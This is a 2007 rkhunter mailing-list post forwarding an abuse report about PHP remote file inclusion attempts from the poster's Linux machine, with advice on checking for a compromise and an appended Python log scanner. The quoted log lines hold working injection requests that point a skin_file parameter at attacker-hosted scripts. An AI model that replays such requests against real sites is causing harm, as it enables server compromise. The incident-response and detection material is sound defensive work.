Hi all!

I got the report below this morning. I've run rkhunter and it reports no rootkit. Anyone seen this before? The computer using the IP address is a Linux machine.

------
[EMAIL PROTECTED] - Sun Dec 02 17:20:21 2007]:

Greetings:

IP Address of attacker: xxx.yyy.zzz.zzz

Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

Sample log report including date and time stamp:

 Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:16:59:21 -0800] "GET /logos/banners//index.php?skin_file=http://www.n0n-clan.net//vwar/convert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

 Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:16:59:22 -0800] "GET //index.php?skin_file=http://www.n0n-clan.net//vwar/convert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

 Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:16:59:22 -0800] "GET /logos//index.php?skin_file=http://www.n0n-clan.net//vwar/convert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

 Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:17:00:16 -0800] "GET /logos/banners//index.php?skin_file=http://www.rjscomputers.co.uk/cslivehelp/txt-db-api/remot.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

 Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:17:00:16 -0800] "GET //index.php?skin_file=http://www.rjscomputers.co.uk/cslivehelp/txt-db-api/remot.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

 Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:17:00:17 -0800] "GET /logos//index.php?skin_file=http://www.rjscomputers.co.uk/cslivehelp/txt-db-api/remot.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

NOTES:

URL Injection attacks typically mean the server for which the IP address of
the attacker is bound is a compromised server. Please check the server
behind the IP address above for suspicious files in /tmp, /var/tmp,
/dev/shm, along with checking the process tree (ps -efl or ps -auwx). You
may also want to check out http://www.chkrootkit.org/ and
http://www.rootkit.nl/ as tools which should be used in addition to
checking the directories and process tree. Please use "ls -lab" for checking
directories as sometimes compromised servers will have hidden files that a
regular "ls" will not show.
-----------


Best wishes!
--

Johan Sundström
Västerbottens museum
Box 3183
903 04 Umeå

Tel.      090 - 17 18 33
Mobile    070 - 321 84 04
E-mail    [EMAIL PROTECTED]
Web       http://www.vasterbottensmuseum.se
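As an added example (not part of the original post or of the abuse report), a small Python scanner that parses the "Request:" lines in such a report and flags any query parameter whose value is a remote URL, which is the remote-file-inclusion pattern the report calls URL injection. The sample input is constructed from two lines of the report above plus one benign request that must not be flagged; the regex assumes the report's Apache-style line layout.

```python
import re

# Constructed sample: two "Request:" lines from the abuse report above plus one
# ordinary request (constructed) that must not be flagged.
SAMPLE_LOG = """\
 Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:16:59:22 -0800] "GET //index.php?skin_file=http://www.n0n-clan.net//vwar/convert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"
 Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - [01/Dec/2007:17:00:16 -0800] "GET /logos/banners//index.php?skin_file=http://www.rjscomputers.co.uk/cslivehelp/txt-db-api/remot.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"
 Request: onlinesurfnshop.com 192.0.2.10 - - [01/Dec/2007:17:01:00 -0800] "GET /index.php?skin_file=default HTTP/1.1" 200 1234 "-" "Mozilla/5.0" - "-"
"""

# Field layout of the report's "Request:" lines (Apache combined-style).
LINE_RE = re.compile(
    r'Request:\s+(?P<vhost>\S+)\s+(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>\S+)\s+(?P<target>\S+)\s+[^"]*"\s+(?P<status>\d{3})\s+\S+\s+'
    r'"[^"]*"\s+"(?P<ua>[^"]*)"'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def parse_request_line(line):
    """Parse one 'Request:' line; return a dict of fields, or None if it does not match."""
    m = LINE_RE.search(line)
    return m.groupdict() if m else None

def remote_include_params(target):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    _, _, query = target.partition("?")
    hits = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if value.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits

def scan_log(text):
    """Flag requests that try to make an include-style parameter fetch a remote file."""
    findings = []
    for line in text.splitlines():
        rec = parse_request_line(line)
        if not rec:
            continue
        hits = remote_include_params(rec["target"])
        if hits:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "ua": rec["ua"],
                             "status": rec["status"], "params": hits})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run over a real access log the same scanner gives you the source IPs and timestamps to compare against outbound connections and process history on the machine named in the report.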



_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users